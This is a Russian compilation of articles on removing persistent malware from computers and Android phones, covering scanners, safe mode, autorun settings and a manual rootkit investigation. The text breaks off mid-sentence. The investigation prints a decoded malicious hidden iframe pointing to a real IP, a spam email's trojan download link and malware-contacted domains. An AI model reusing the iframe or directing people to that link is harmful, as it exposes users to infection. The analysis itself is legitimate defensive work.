Как удалить вирус если он не удаляется: Как удалить вирус, который не удаляется

Как удалить вирус, который не удаляется

Модифицированные вредоносные программы проникают в чреве компьютера настолько молниеносно и хитро, что обычный антивирус не способен даже обнаружить их появление, не то что избавить от их существования.

Некоторые несведущие пользователи долго не могут понять, почему так «тормозит» ПК, почему браузер открывает совсем не те ссылки, которые должен и почему файлы на компьютере создаются  и изменяются сами собой. Кто-то в этой ситуации бежит к компьютерным гениям, а кто-то пытается разобраться в корне проблемы, черпая необходимую информацию из сети или других источников.

На самом деле, бороться с напастью весьма несложно, главное иметь под рукой средства, способные помочь в любой момент.

Вирус

Да, в последнее время все чаще появляются типы компьютерных вирусов, которые маскируются под обычные с виду папки, ничем не отличающиеся от других. Видя на ПК файл, создание которого не отложилось в памяти, чаще всего нажатием кнопки DEL  его отправляют, как, казалось бы, на покой, стирая из памяти устройства.

Однако при следующей загрузке персонального устройства, файл оказывается на том же самом месте, с которого его вроде бы как удалили. Не надо в этом случае грешить на оперативное запоминающее устройство, расположенное в самом главном человеческом органе, мозге. Ответ на эту загадку прост и ясен. На компьютере расположился  слегка необычный вирус.

Еще одной разновидностью «противного ПО» является установка «левых» поисковых систем в браузере устройства. Да, они не наносят вреда начинке ПК, однако поисковые системы неопознанного образца самый настоящий вирус, который обладает всеми его проявлениями, включая способность красть информацию, сохраненную на персональном устройстве.

Чаще всего, под невинной маской скрываются самые настоящие трояны, не щадящие никого и ничего.

Пути заражения вредоносным ПО

Болезнь лучше предупредить, чем лечить. С этим тезисом знаком каждый, кто хоть раз в жизни переболел серьезным вирусом. Так вот, в случае с компьютерным вирусом ситуация абсолютно аналогичная.

Чаще всего компьютерные вирусы попадают на компьютер через всемирную паутину в процессе скачивания программ, утилит или других приложений.

Для того, чтобы не допустить  заражения, следует обратить внимание на определенные факторы до начала загрузки из интернета.

Факторы:

• источник закачки;
• версия антивируса на ПК;
• отзывы;
• контент.

Брать информацию лучше только с проверенных сайтов, на которых на каждый продукт есть определенное количество отзывов, желательно развернутых и не однотипных. Перед началом закачки следует проверить версию антивируса на персональном устройстве и предварительно обновить ее, если она безнадежно устарела. Если есть возможность рассмотреть «сердцевину» папки или архива, который необходим, то это надо сделать обязательно, проверив  на наличие файлов, не имеющих отношения к скачиваемому контенту.

Утилиты для удаления вредоносных программ

Существует ряд программ, которые направлены на избавление от самых «вредных» вирусов.

Утилиты:

• утилита Касперского;
• DR.Web Cureit;
• утилита Nod32.

На самом деле таких утилит гораздо больше, но вышеперечисленные наиболее известны и применяемы.

Чаще всего пользователи останавливают свой выбор на DR.Web Cureit. Данный продукт зарекомендовал себя исключительно с положительной стороны и помог выбраться из лап паука многим юзерам.

Надо отметить, что хранить утилиту следует на съемном носителе, например флешке, что позволит избавиться от вируса даже в том случае, если в результате заражения, доступ к компьютеру ограничен. Скачивать ПО лучше с сайта официального производителя. Надо отметить, что там доступна версия ознакомительного характера, которая будет доступна только ограниченный промежуток времени, которого, однако, безусловно, хватит для избавления от недуга.

Процесс запуска утилиты прост, следует запустить ее из места, в котором она сохранена, будь то съемный носитель или жесткий диск устройства.

После запуска DR.Web предложит провести проверку ПК в режиме усиленной защиты, в это время пользоваться компьютером будет нельзя. После проведения полной проверки Cureit вылечит те файлы, которые еще можно спасти и удалит источники заражения. Для закрепления результата следует перегрузить персональное устройство и компьютер без вирусов будет полностью работоспособен.

Ноя 19, 2015 22:03

Как удалить вирусы из зараженного компьютера или ноутбука.

Процесс удаления вирусов из компьютера тернист. Вредоносные программы хорошо научились защищать себя от антивирусов. Бывает, что удалить вирусы с одного раза не получается. Приходится прогонять антивирусные программы по несколько раз, причем несколькими антивирусными программами. Дело в том, что у каждой антивирусной программы есть своя антивирусная база. Она непрерывно пополняется свежими телами новых вирусов. Опасными для заражения являются только свежие вирусы. И не факт, что такие вирусы включены в базу одного антивируса. Вероятность обнаружения нового вируса растет с количеством используемых антивирусных программ. Вывод: чем больше антивирусов проверили ваш компьютер, тем выше вероятность удаления вируса.

На зараженном компьютере многие вирусы не лечатся. Более того, часто на зараженный компьютер вы не сможете установить антивирус.  Вирусы научились блокировать установку антивирусов.   Радикальное удаление вирусов начинается с того, что жесткий диск снимают и устанавливают вторым на компьютер с антивирусным программным обеспечением.  При этом нужно обойти систему защиты Windows  и обеспечить доступ ко всем папкам на зараженном  диске, иначе некоторые области на диске останутся не пролеченными, вирусы останутся в компьютере. Это возможно не на всех версиях Windows, обычно на профессиональных.

Далее производится лечение вирусов и троянов с помощью обновленных антивирусных программ.  Лучше лечить и удалить вирусы в помощью нескольких антивирусов. Как правило, для этого используют лучшие российские и зарубежные антивирусные программы или специальные бесплатные утилиты – Касперского (Kaspersky virus removal toolkit), DRWEB (Cureit), NOD32. Если доступ на эти сайты блокирован, то это явный признак заражения.

Однако то, что известные антивирусы не находят вирусы и трояны на жестком диске, не означает, что их там нет. Свидетельством их присутствия могут быть специфические признаки вирусов – 100% загруженность процессора, высокая сетевая активность компьютера, блокирование установки антивирусов, появление подозрительных программ в автозагрузке, вскрытие аккаунтов и др. проявления вирусов и троянских программ.

Как удалить вирусы из системы зараженного компьютера?

Для этого нужно, чтобы было либо загрузочное устройство (флешка или диск), либо операционная система хотя бы запускалась.

В первом случае нужно запустить операционную систему, открыть на ней доступ ко всем областям диска и пролечить диск специальными утилитами от DRWEB или Касперского.

Если доступ открыть не удастся, то и лечение проблематично и вряд ли удастся. Такое обычно происходит, если был установлен пароль при входе в Windows на учетную запись и данные защищаются средствами операционной системы. Открыть доступ не получится.

Часто много сил уходит, чтобы загрузиться с зараженного компьютера – компьютер бывает заблокирован СМС-блокером, либо не запускается проводник. В последнем случае нужно запуститься в безопасном режиме с поддержкой командной строки и запустить explorer.exe в командной строке. Если проводник запустится, то дальше уже дело техники запустить антивирусную утилиту.

Вопрос может решиться простым способом. Если же эти утилиты удается запустить из операционной системы зараженного компьютера. Хотя бы из режима защиты от сбоев. Иногда можно вылечить компьютер от простых вирусов путем удаления запуска вредоносных программ из автозагрузки Windows. Но таким образом удаляются только самые примитивные вирусы. Умные вирусы восстанавливают удаленную строку в автозагрузке после перезагрузки.

То же касается и остановки процесса. Если завершить вредоносный процесс вручную, то продвинутый вирус его восстановит через несколько секунд.

Удаление последствий вирусов

Главный вопрос, не как удалить вирус, а что делать после удаления, если следы вируса остались? После лечения вирусов Windows может не запускаться, работать с ошибками, зависать. И все потому что вирусы могут повредить системные файлы операционной системы. Заранее предсказать такое повреждение операционной системы невозможно. Никто не знает, как работают вирусы, попавшие в компьютер. Всего же вирусов насчитывается более миллиона. Скорее всего, потребуется восстановление системы или пере установка Windows. После лечения компьютера от вирусов обязательно нужно проверить работу операционной системы. А также погонять программы и тесты.

Некоторые последствия вирусов, например, зашифрованные файлы фото и видео, устранить чрезвычайно сложно. Причина  – невозможно найти  программу дешифрирования.

После того, как процесс по удалению вирусов закончен, следует пролечить компьютер от шпионов. Шпионы – это процессы, которые не относятся к вирусам. Но по вредоносности могут с ними поспорить. Лечение от шпионов производится компьютере, зараженном  шпионами. Поскольку процесс нельзя вылечить на другом компьютере. После удаления шпионов и установки антивирусной защиты можно считать процесс вирусолечения законченным. Кстати, в большинстве случаев удаление шпионов с первого раза не происходит. Эту процедуру нужно запускать несколько раз и обязательно после обновления базы.

Иногда действие вирусов путают с аппаратными или программными неисправностями. В действительности нужен ремонт компьютера. Для начала нужно ознакомиться с неисправностями компьютеров, которые можно принять за последствия вируса.

Как удалить вирус с телефона, который не удаляется

Смартфон — это не просто телефон. С его помощью делают покупки, совершают банковские операции, проводят конференции. Поэтому защита персональной информации от вредоносных программ выходит на первое место. Но как удалить вирус с телефона, если он уже пустил корни в систему? Разберемся.

Вирусы на телефоне: симптомы

Что такое вирус? Это болезнь операционной системы, и, как у большинства недугов, у нее есть симптомы.

Вот несколько признаков, которые говорят, что в смартфоне хозяйничают вирусы:

1. Некорректная работа приложений: частые лаги, вылеты, произвольное завершение работы.
2. Необоснованно быстрая разрядка аккумулятора и перегрев устройства.
3. Открываются вкладки с рекламой. Баннеры всплывают в проводнике даже без доступа к Сети.
4. Повреждение и/или исчезновение файлов на карте или внутренней памяти телефона.
5. Скачивание и установка программ без согласия пользователя.
6. Спам через систему текстовых сообщений на незнакомые номера.

Эти симптомы проявляются чаще остальных. Если ни одного из них не обнаружено, а смартфон все равно работает со странностями, возможно, он заражен скрытым вирусом. Но как бы он ни прятался — ему не жить!

Слишком кровожадно? А как иначе, если нежеланный софт вредит любимому смартфону. Чтобы уничтожить вредоносное ПО на мобильном устройстве, проведите проверку на вирусы с помощью специального приложения. Подойдет любая программа с оценкой не ниже четверки на Play Market.

Установите приложение и просканируйте систему. Обнаружен вирус? Следуйте инструкциям программы. Если удаление ни к чему не привело, поздравляем: вы столкнулись с крепким орешком. Но не стоит расстраиваться, и на него найдется управа.

Что делать, если вирусы на телефоне не удаляются

Есть несколько методов удалить вирусы, от которых не избавиться обычным способом:

• Позвать старшего брата.

Логика этого метода проста — если не справляется мобильный антивирус, справится его «старший брат» на ПК.

В настройках смартфона активируйте отладку USB, затем подключите устройство к ПК или ноутбуку и проведите сканирование файлов антивирусом компьютера. После обнаружения удалите вредоносную программу.

Фото: 1comp.spb.ru: UGC

Вероятно, что на этом проблемы с вирусом закончатся, так как защитные программы компьютеров более могущественны, чем их мобильные версии.

• Найти и уничтожить.

Этот способ подразумевает ручное удаление вируса, но для начала необходимо отследить его местоположение в системе.

Читайте также: Почему нагревается телефон при зарядке и разговоре

Откройте меню «Настройки» и перейдите в диспетчер приложений. Переключитесь на вкладку «В работе» и просмотрите список запущенных программ. Нашли неизвестное приложение? Отследите его корневую папку и удалите. Это можно сделать через ПК или с телефона (если есть доступ).

Внимание: действуя вслепую, рискуете случайно удалить важные системные файлы. Поэтому перед удалением незнакомой программы вбейте ее название в Google. Если выяснится, что это вирус, — уничтожьте его.

• Усыпить бдительность и удалить.

Иногда вирус блокирует защитные функции смартфона и не позволяет себя удалить. Однако и таких «хитрецов» можно провести. В этом поможет Safe Mode (безопасный режим).

Большинство телефонов на Android 4. 1 и выше переводятся в безопасный режим так:

1. Зажмите клавишу питания на несколько секунд.
2. После появления надписей «Выключить» и «Перезагрузка» нажмите первую и держите.

Через какое-то время система предложит перейти в безопасный режим.

Примечание: если не сработало, подержите палец на кнопке «Перезагрузка» или одновременно удерживайте две клавиши громкости и кнопку питания во время включения телефона.

На смартфоне в режиме Safe Mode работают только системные программы, а значит вирус будет «спать». Воспользуйтесь этим и прекратите безобразие.

• Вернуться к истокам.

Если предыдущие методы не помогли удалить вирусы, придется идти на крайнюю меру — откатить телефон к заводским настройкам.

Для этого зайдите в параметры телефона и перейдите во вкладку «Восстановление и сброс». На некоторых смартфонах эта функция находится в пункте «Память и резервные копии».

Затем выберите вариант сброса и подтвердите действие. После этого смартфон удалит всю информацию, которой не было на момент покупки устройства. Вместе с тем исчезнут и вирусы.

Примечание: если не хотите терять телефонные контакты и медиафайлы перед сбросом настроек, первые перенесите на SIM-карту, а вторые — скиньте на компьютер.

После обнаружения вируса на смартфоне его нужно немедленно удалить. Промедление может стоить важной информации: данных о платежных картах и электронных кошельках, личных фотографий и видео. Чтобы избежать подобной неприятности, для борьбы с вирусами используйте методы, описанные в статье. Удачи!

Читайте также: Что делать, если потерял телефон: как его найти

Оригинал статьи: https://www.nur.kz/1719347-kak-udalit-virus-s-telefona-kotoryj-ne-udalaetsa.html

Как удалить вирус с компьютера?

Все мы хотя бы раз в жизни сталкивались с вредоносными программами. Вредоносная программа – это приложение, которое следит за вами, уничтожает ваши данные или жесткий диск, а также передает кому-либо другому контроль за вашим девайсом. Что бы ни делала подобная программа, она вряд ли принесет пользу вам или вашему компьютеру. И, учитывая огромное количество и разнообразие существующих вредоносных программ, это всего лишь вопрос времени, когда вы подвергнетесь атаке.

Не паникуйте — вот наиболее ценный совет, который можно дать человеку, подозревающему наличие вируса на его компьютере. Кроме того, не стоит думать, что теперь вам придется полностью очистить ваш ПК от всех файлов и начать работу на нем с чистого листа. Чаще всего избавиться от вредоносной программы можно, не затрагивая все содержимое. Да, некоторые данные могут быть потеряны в ходе удаления вируса, но вам вряд ли придется удалить все, что у вас есть.

Для начала вам стоит убедиться, что ваш компьютер действительно заражен вирусом. Существует несколько признаков, позволяющих это распознать. Например, медленная работа или выскакивающее сообщение о повреждении файла при попытке его открыть. Если ваш браузер внезапно меняет начальную страницу или автоматически переходит на незнакомый вам сайт, это также может быть сигналом заражения вредоносным ПО. Также об этом может свидетельствовать частое выключение или поломки компьютера.

Если вы предполагаете, что ваш компьютер заражен, то вам необходимо запустить антивирусную программу. Некоторые вирусы умны настолько, что отключают антивирусник. Если у вас его вообще нет, то самое время его приобрести и установить. Некоторые вирусы попытаются не дать вам загрузить антивирусное приложение. В таком случае, вам необходимо скачать программу на другой компьютер и перенести ее при помощи диска или флеш-карты.

 

Как обнаружить и удалить компьютерный вирус

По сути, наличие антивирусного программного обеспечения – это практические обязательное требование для всех пользователей операционной системы Windows. Вы можете крайне аккуратно использовать свой компьютер и, исходя из этого, быть уверены, что не подцепите вирус, но правда заключается в том, что создатели вредоносных программ находятся в постоянном поиске новых способов их распространения. На данный момент существует несколько различных антивирусных программ: одни можно установить бесплатно, другие же придется купить. Стоит помнить, что в бесплатной версии почти всегда отсутствуют некоторые важные функции, которые есть в платной версии того же продукта.  

Давайте начнем с предположения, что вы можете запустить антивирусное ПО на своем компьютере (чуть ниже мы расскажем, что делать, если вдруг это невозможно). Если у вас стоит самый современный авнтивирусник, который вовремя обновляется, то он должен обнаруживать вредоносные программы на вашем компьютере. У большинства антивирусных ПО есть специальный раздел со всеми обнаруженными к данному моменту вирусами.  Выпишите на отдельный листок все названия найденных на вашем компьютере вирусов – это может потом пригодиться.

Многие антивирусные программы могут попытаться удалить или изолировать вредоносную программу. Вам всего лишь надо выбрать необходимый вариант и подтвердить ваш выбор. Для большинства пользователей это наилучший вариант решения проблемы; попытка самостоятельно избавиться от вируса может привести к не лучшим последствиям.

После того, как антивирус сообщит, что вредоносные программы были успешно удалены, вам необходимо выключить или перезагрузить компьютер, а после его повторного включения заново запустить антивирусник. Если он не найдет ни одного вируса, значит проблема решена. Если же вирус будет найден, значит, вам придется заново попытаться его удалить. Если антивирусное ПО раз за разом будет находить одну и ту же вредоносную программу, значит, нужно попытаться удалить ее каким-то другим образом.

 

 

Второй лишний

Одна антивирусная программа – хорошо, а две – еще лучше, так? Нет! Антивирус может использовать значительную часть вычислительной мощности вашего компьютера. Использование сразу двух антивирусов существенно замедлит ваш компьютер и может даже привести к его сбою.

Кроме того, далеко не все антивирусные программы совместимы друг с другом, поэтому использование сразу нескольких может сделать ваш компьютер еще более незащищенным, чем отсутствие всяких антивирусов.

 

Советы по удалению компьютерных вирусов

Если вы не можете получить доступ к своему антивирусному программному обеспечению, или при сканировании раз за разом обнаруживается одно и то же вредоносное ПО, вам может потребоваться запуск компьютера в безопасном режиме. Многие компьютерные вирусы могут хранить файлы в папке реестра Windows. В этой папке содержатся инструкции для операционной системы и важная информация о программах на вашем компьютере. В этой же папке может быть заложена программа, которая запускает вирус вместе с запуском операционной системы. Включив свой компьютер в безопасном режиме, вы получите доступ лишь к ключевым элементам операционной системы Windows.

Попробуйте запустить антивирусное ПО в данном режиме. Если вы увидите, что оно обнаружило новую вредоносную программу, вполне возможно, что именно в этой программе и кроется ключ к решению проблемы. Некоторые вредоносные программы существуют только для того, чтобы скачивать и запускать другие вредоносные программы на вашем компьютере. Будет прекрасно, если вы сможете их все удалить.

Если по какой-то причине ваш антивирусник не может удалить вирус, то придется еще немного постараться. Помните совет о том, чтобы выписать все названия найденных вирусов? Сейчас они нам могут пригодиться. Вам нужно будет найти каждое из выписанных названий в интернете, обязательно на странице используемой вами антивирусной фирмы. Необходимо использовать именно ту фирму, чье антивирусное ПО у вас стоит, потому что разные фирмы иногда дают разные имена одним и тем же вирусам.

На большинстве сайтов антивирусного ПО приводятся все файлы, связанные с конкретным вирусов, а также где эти файлы предположительно можно найти. Возможно, вам придется немного покопаться, чтобы найти каждый файл. Перед удалением любых файлов необходимо сохранить резервную копию папки реестра. Если вы случайно удалите не тот файл, это может затруднить или даже нарушить работу вашего компьютера.

Удалите все связанные с вредоносным ПО файлы, которые есть в вашем списке. Как только это будет сделано, вам нужно будет перезагрузить компьютер, снова запустить антивирусное программное обеспечение и надеяться, что больше никаких вирусов не будет найдено.

Вы также можете обновить регистрационную информацию своих аккаунтов. Некоторые вредоносные программы могут отслеживать ввод с клавиатуры и отсылать ваши пароли и информацию о вас удаленному пользователю. Это тот случай, когда лучше перестраховаться, чем потом жалеть.

 

Защита от компьютерных вирусов

Существует несколько простых правил, позволяющих защитить себя от компьютерных вирусов. Большинство из них исходят из категории здравого смысла.

Не открывайте вложения или гиперссылки, присланные вам по мейлу незнакомыми людьми. Часто подобные действия могут перевести вас на страницу с вредоносной программой. Если ваша почта настроена на автоматическое открытие подобных ссылок, измените настройки, иначе вы можете подцепить вирус.   

То же касается и других сообщений. Гиперссылки на доске объявлений, в сообщениях на Facebook или в личной переписке также могут перенести вас на страницу с вирусом. Обратите внимание на отправителя письма. Ищите любые странности, такие, как ошибки в письме или странные формулировки. Если с адреса знакомого вам человека начинают посылать подозрительные ссылки, то стоит сообщить ему об этом – вполне может стать так, что его аккаунт взломали.

Не заходите на подозрительные веб-сайты. Это касается самых разных ресурсов, начиная со скачивания ПО, музыки и заканчивая пиратским видео и порно. Многие из современных веб-браузеров предупредят вас, если вы попытаетесь перейти на предположительно вредоносный сайт. Обращайте особое внимание на подобные предупреждения и держитесь подальше от таких сайтов.

Обращайте особое внимание на любые окна, которые открываются в момент просмотра веб-страниц. Будьте особенно осторожны, если сайт выводит вам уведомление о том, что вам нужно загрузить последний видеодрайвер, чтобы что-то посмотреть. Это обычный способ распространения вредоносного ПО.

Запускайте антивирусную программу хотя бы раз в неделю. Кроме того, регулярно обновляйте антивирус и вашу операционную систему. Большинство обновлений антивирусного ПО выходят не реже одного раза в неделю, так как фирма добавляет большее количество обнаруженных вирусов в свои базы данных.

Правила, позволяющие избежать заражения вирусом, могут показаться непростыми и требующими слишком большИх усилий, но проще придерживаться этих правил, чем пытаться спасти поврежденный вирусом компьютер. 

 

В худшем случае

Если вы не можете удалить вирус вне зависимости от того, какой метод вы пробовали, возможно, пришло время смириться и выполнить полную очистку системы, включающую форматирование жесткого диска и перезагрузку операционной системы. Подобное действие удалит всю вашу информацию, поэтому перед этим обязательно сохраните резервные копии любых важных файлов без вирусов.

Источник

Удаляем вирус из системы.

Удаляем вирус из системы. Что делать, если антивирус не справился со своей работой. &nbsp &nbsp Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или … много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус — это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) — гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами — не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования. Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден — должна быть запущена какая-то программа. Идеально - с административными правами, желательно — без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. — большинство грамотных пользователей данную опцию отключили навсегда. Для отключения функций автозапуска в Windows XP/2000 здесь reg-файл для импорта в реестр. Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета «Автозапуск» панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик: запустить редактор групповых политик gpedit.msc перейти в «Конфигурация компьютера» — — «Конфигурация Windows» — «Административные шаблоны» — «Компоненты Windows» — «Политика автозапуска». установить значение «Вкл.» для компонента «Отключить автозапуск» &nbsp &nbsp Но основным «поставщиком» вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение — «Обозреватель Интернета» (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс — интерпретатор данных, полученных извне. Другими словами, — в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать «сайты для взрослых», сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами «скачать бесплатно» и » скачать без регистрации и SMS». Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы. &nbsp &nbsp Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR’ом, а изменения в реестре отменены PT Startup Monitor’ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код: iframe src=»http://91.142.64.91/ts/in.cgi?rut4″ width=1 height=1 означающий выполнение CGI-сценария сервера с IP — адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат — вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега «iframe» сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами. &nbsp &nbsp В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами — так называемые руткит (rootkit) — технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы. &nbsp &nbsp Удаление «качественного» вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами — вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, — все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить. &nbsp &nbsp Развитие антивирусов тоже не стоит на месте, — они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет «не по зубам» любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса — это работа, которую рано или поздно придется выполнять любому пользователю компьютера. Для примера я взял вирус, ссылку на который получил в спам-письме, следующего содержания: Здравствуйте. Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить наш фирменный бланк резюме и отправить его по адресу [email protected] Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы позвоним Вам в течение нескольких дней. Не забудьте указать телефон, а также позицию, на которую Вы претендуете. Желательно также указать пожелания по окладу. Наш фирменный бланк вы можете скачать по нижеуказанной ссылке. http://verano-konwektor.pl/resume.exe &nbsp &nbsp Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием. &nbsp &nbsp Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер. &nbsp &nbsp Скачиваю файл resume.exe. Размер — 159744 байта. Пока не запускаю. &nbsp &nbsp Копирую файл на другие компьютеры, где установлены различные антивирусы — просто для очередной проверки их эффективности. Результаты не ахти — антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec’у — та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность. &nbsp &nbsp Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором. &nbsp &nbsp Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело. &nbsp &nbsp Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) — надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark’ом) выдает то, что есть на самом деле. &nbsp &nbsp Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку — системе не удалось запустить таинственную службу grande48. Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении — так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать. Определяем наличие вируса в системе. 1. &nbsp &nbsp Наверняка должен быть «левый» трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось — один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п. 2. &nbsp &nbsp Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных — RootkitRevealer Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем «Scan». После непродолжительного сканирования видим результаты: &nbsp &nbsp Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень «свежие» по времени создания/модификации записи или файлы (колонка «Timestamp»). Нас в первую очередь должны заинтересовать файлы с описанием (колонка «Description») — «Hidden from Windows API» — скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений — это, естественно, ненормально. Два файла — grande48.sys и Yoy46.sys — это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала — это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32, а их копии в \system32\dllcache остались видимыми. &nbsp &nbsp Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP). Задача WFP — автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, 